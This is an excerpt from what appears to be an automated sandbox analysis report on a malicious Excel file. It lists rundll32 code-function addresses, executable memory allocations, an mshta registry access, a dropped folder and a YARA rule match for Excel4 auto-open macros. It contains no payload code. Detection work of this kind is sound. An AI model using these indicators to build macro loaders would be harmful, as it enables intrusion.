                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002266CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00217735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00219714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00214816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00221889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00218969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002309B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002159F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00211A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00218B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00220B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00227BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00219B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00224B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00228BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00229BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00212BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00217C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00213C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00230C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00226C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00214C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00225CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00216D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00226DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00219DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00227DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00230E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00213E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00215E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00220E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00214EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00229EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00230F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00217FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E9011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E3C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F20BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001ED6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EF8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F4116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002013AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EAB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F95FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E7FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E59F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E4816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F8606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00200E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F0001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E3E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001FAC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E7C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001FF435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001FC631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001FAA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00200C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001FBE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E4C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E1A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F0E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E2051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E2251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F6C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001FAE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00200056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001FA666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E5E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EF09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EEA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F1889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EEE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E70B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001FDEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EE2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F66CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EB2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F5CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EAEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001FDCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F9EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001FA2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E64E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E4EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F8519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F0B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E9714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00200F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E8B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E7735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E6D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001FBB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EA55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001FCB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F2550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EB74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E5548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E4346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001ECF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EBB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E8969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E5361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001FE395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EE991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002009B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001FD389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F4B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E9B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E51BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E81B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F7BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001FC3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E2BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F7DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F9BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E9DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EE5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F6DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EDFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001FDBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F8BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0072F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0072E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0072AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00740056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00722051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00729011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00730001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007270B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007320BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0072F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00734116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007281B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007251BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00722251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0072B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0072E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00725361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00724346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007413AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007264E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00732550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0072A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00725548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00738519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007395FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0072E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00738606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0072D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007366CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0072B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00727735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00729714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00724816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00731889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00728969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007259F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007409B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00721A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0072EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0072BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00728B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00730B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00738BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00722BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00739BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00737BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00729B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00734B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00724C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00736C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00727C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00723C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00740C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00735CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00726D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00736DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00737DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00729DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00725E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00730E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00723E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00740E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0072AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00724EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00739EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0072EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0072CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00740F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00727FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0072DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0077907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0077A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0077AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0077044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00769011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00770001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0076F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0076AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_007664E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0077A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0076E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_007720BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0076EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0076BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00772550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00780F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00766D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00774116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00778519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00767FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0076DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00762BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00769DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_007681B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0077E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00765E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00761A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00770E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00762051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00762251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00764C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00780056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00776C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00767C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0077F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00780E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0077C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0077AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00763E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00763C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0077AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0077BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00764816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00780C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00778606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0077DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00764EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00779EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0077DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0076D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0076B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00775CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_007766CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_007670B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0076F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0076EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00771889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00765361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0077176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00768969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0076A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0077CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00764346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0076CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0076B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0077894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00765548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00767735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0077473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00768B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0077BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00769714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00770B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_007659F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_007795FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00776DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00778BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0077DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00777DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00779BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0076E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_007809B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_007651BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00777BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_007813AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0077C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0076E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00774B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0076AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00769B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0077D389
                            Source: 4885.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                            Source: opastonline.com.xlsMacro extractor: Sheet name: LINKO
                            Source: opastonline.com.xlsMacro extractor: Sheet name: LINKO
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: opastonline.com.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Users\user\Desktop\opastonline.com.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Diftwn\Jump to behavior
